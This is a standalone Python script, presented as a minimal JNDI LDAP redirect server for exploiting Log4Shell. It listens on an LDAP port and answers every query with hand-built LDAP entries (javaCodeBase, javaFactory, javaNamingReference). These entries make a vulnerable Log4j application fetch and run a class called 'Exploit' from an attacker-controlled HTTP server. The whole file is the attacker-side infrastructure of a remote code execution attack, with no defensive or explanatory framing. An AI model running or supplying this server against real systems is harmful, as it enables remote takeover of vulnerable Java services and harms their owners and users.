#!/usr/bin/env python3
"""Minimal JNDI LDAP redirect server for Log4Shell exploitation"""
import socket
import struct
import sys
import threading

HTTP_HOST = sys.argv[1] if len(sys.argv) > 1 else "0.0.0.0"
HTTP_PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 8888
LDAP_PORT = int(sys.argv[3]) if len(sys.argv) > 3 else 1389
CODEBASE = f"http://{HTTP_HOST}:{HTTP_PORT}/"

def build_ldap_response(message_id):
    """Build LDAP SearchResultEntry with javaCodebase reference"""
    # LDAP SearchResultEntry pointing to our HTTP server
    class_name = b"Exploit"
    codebase = CODEBASE.encode()
    factory = b"Exploit"
    
    # Build attributes
    def encode_ldap_string(s):
        if len(s) < 128:
            return bytes([0x04, len(s)]) + s
        else:
            length_bytes = s.__len__().to_bytes((s.__len__().bit_length() + 7) // 8, 'big')
            return bytes([0x04, 0x80 | len(length_bytes)]) + length_bytes + s
    
    # Partial attributes
    attrs = b""
    
    # javaClassName
    attr_type = encode_ldap_string(b"javaClassName")
    attr_vals = bytes([0x31, len(class_name) + 2]) + encode_ldap_string(class_name)
    attr = bytes([0x30, len(attr_type) + len(attr_vals)]) + attr_type + attr_vals
    attrs += attr
    
    # javaCodeBase 
    attr_type = encode_ldap_string(b"javaCodeBase")
    attr_vals = bytes([0x31, len(codebase) + 2]) + encode_ldap_string(codebase)
    attr = bytes([0x30, len(attr_type) + len(attr_vals)]) + attr_type + attr_vals
    attrs += attr
    
    # objectClass: javaNamingReference
    ref = b"javaNamingReference"
    attr_type = encode_ldap_string(b"objectClass")
    attr_vals = bytes([0x31, len(ref) + 2]) + encode_ldap_string(ref)
    attr = bytes([0x30, len(attr_type) + len(attr_vals)]) + attr_type + attr_vals
    attrs += attr
    
    # javaFactory
    attr_type = encode_ldap_string(b"javaFactory")
    attr_vals = bytes([0x31, len(factory) + 2]) + encode_ldap_string(factory)
    attr = bytes([0x30, len(attr_type) + len(attr_vals)]) + attr_type + attr_vals
    attrs += attr
    
    # DN
    dn = encode_ldap_string(b"a")
    
    # SearchResultEntry
    attrs_seq = bytes([0x30, len(attrs)]) + attrs
    entry = bytes([0x64, len(dn) + len(attrs_seq)]) + dn + attrs_seq
    
    # Message envelope
    msg_id = bytes([0x02, 0x01, message_id])
    full = bytes([0x30, len(msg_id) + len(entry)]) + msg_id + entry
    
    # SearchResultDone (success)
    done_result = bytes([0x0a, 0x01, 0x00]) + bytes([0x04, 0x00]) + bytes([0x04, 0x00])
    done = bytes([0x65, len(done_result)]) + done_result
    done_msg = bytes([0x30, len(msg_id) + len(done)]) + msg_id + done
    
    return full + done_msg

def handle_client(conn, addr):
    print(f"[LDAP] Connection from {addr}")
    try:
        data = conn.recv(4096)
        if data:
            # Extract message ID (simplified)
            msg_id = data[4] if len(data) > 4 else 1
            print(f"[LDAP] Got request, msgID={msg_id}, sending redirect to {CODEBASE}")
            response = build_ldap_response(msg_id)
            conn.send(response)
    except Exception as e:
        print(f"[LDAP] Error: {e}")
    finally:
        conn.close()

def main():
    print(f"[*] LDAP server on :{LDAP_PORT}")
    print(f"[*] Redirecting to {CODEBASE}")
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", LDAP_PORT))
    srv.listen(5)
    while True:
        conn, addr = srv.accept()
        threading.Thread(target=handle_client, args=(conn, addr), daemon=True).start()

if __name__ == "__main__":
    main()
